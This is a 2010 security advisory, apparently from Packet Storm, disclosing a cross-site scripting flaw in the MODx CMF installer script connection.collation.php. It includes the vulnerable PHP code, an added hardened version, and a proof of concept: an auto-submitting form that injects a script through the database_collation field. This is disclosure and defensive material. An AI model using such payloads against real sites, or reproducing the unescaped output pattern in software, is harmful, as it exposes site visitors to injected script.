MODx CMF 1.0.3 / 1.0.4 Cross Site Scripting

2010-07-08T00:00:00
ID PACKETSTORM:91612
Type packetstorm
Reporter Andrei Rimsa Alvares
Modified 2010-07-08T00:00:00

Description

Title: MODx Installation File XSS Vulnerability  
Vendor: MODx  
Product: MODx CMF  
Tested Versions: 1.0.3, 1.0.4  
Threat Class: XSS  
Severity: Medium  
Remote: yes  
Local: no  
Discovered By: Andrei Rimsa Alvares  
  
===== Description =====  
  
MODx CMF is prone to an XSS vulnerability caused by unsanitized user input. The bug is in a file used during the installation process. The affected file is described below:  
  
--- install/connection.collation.php ----  
01: <?php  
...  
06: $database_collation = $_POST['database_collation'];  
...  
08: $output = '<select id="database_collation" name="database_collation">  
09: <option value="'.$database_collation.'" selected >'.$database_collation.'</option></select>';  
...  
23: echo $output;  
24: ?>  
--- install/connection.collation.php ----  
  
The variable $database_collation (line 6) receives user data via an HTTP POST request and is propagated to the variable $output (line 9) without proper sanitization. The $output variable is later echoed to the page on every program path (line 23), which causes the bug.  
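As an added illustration, not MODx project code, the pattern from install/connection.collation.php is shown beside a hardened version that validates the POSTed value against an allow-list and escapes it on output; the regex, the fallback collation and the function names are assumptions made for this example.  

```php
<?php
// Added example (not MODx project code): the vulnerable pattern from
// install/connection.collation.php beside a hardened version.
// The allow-list regex and the fallback value are assumptions for illustration.

// Vulnerable: the POST value is concatenated straight into HTML, so a value
// that closes the <option> and <select> tags can inject its own markup.
function render_collation_vulnerable(array $post): string
{
    $database_collation = $post['database_collation'];
    return '<select id="database_collation" name="database_collation">'
         . '<option value="' . $database_collation . '" selected >'
         . $database_collation . '</option></select>';
}

// Hardened: validate the value against the shape of a MySQL collation name
// (letters, digits, underscores) and escape it on output as well.
function render_collation_hardened(array $post): string
{
    $raw = isset($post['database_collation']) ? (string) $post['database_collation'] : '';

    // Allow-list: identifiers such as utf8_general_ci. Anything else is
    // replaced by a safe default instead of being echoed back.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $raw)) {
        $raw = 'utf8_general_ci';   // assumed default, for illustration only
    }

    // Defence in depth: escape for both the attribute and the element content,
    // so even a permitted value cannot alter the surrounding markup.
    $safe = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
    return '<select id="database_collation" name="database_collation">'
         . '<option value="' . $safe . '" selected>' . $safe . '</option></select>';
}

// Constructed sample input with the same tag-closing shape as the advisory's
// proof of concept (this is test data, not a request captured from a site).
$sample = ['database_collation' => '</option></select><b>injected</b>'];
echo render_collation_vulnerable($sample), "\n";  // markup is broken open
echo render_collation_hardened($sample), "\n";    // falls back to the default
```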
  
===== Impact =====  
  
Malicious JavaScript code can be executed in the context of the affected web site.  
  
===== Proof of Concept =====  
  
<form action="http://target/install/connection.collation.php" name="evil" method="post">  
<input type="hidden" name="database_collation" value="</option></select><script>window.alert(String.fromCharCode(88,83,83));</script>" />  
</form>  
<script>  
document.evil.submit();  
</script>  
  
===== Workaround =====  
  
Remove all installation files after MODx is successfully installed.  
  
===== Disclosure Timeline =====  
  
June 16, 2010 - Vendor notification.  
July 07, 2010 - No vendor reply. Public disclosure.  
  
===== References =====  
  
http://modxcms.com  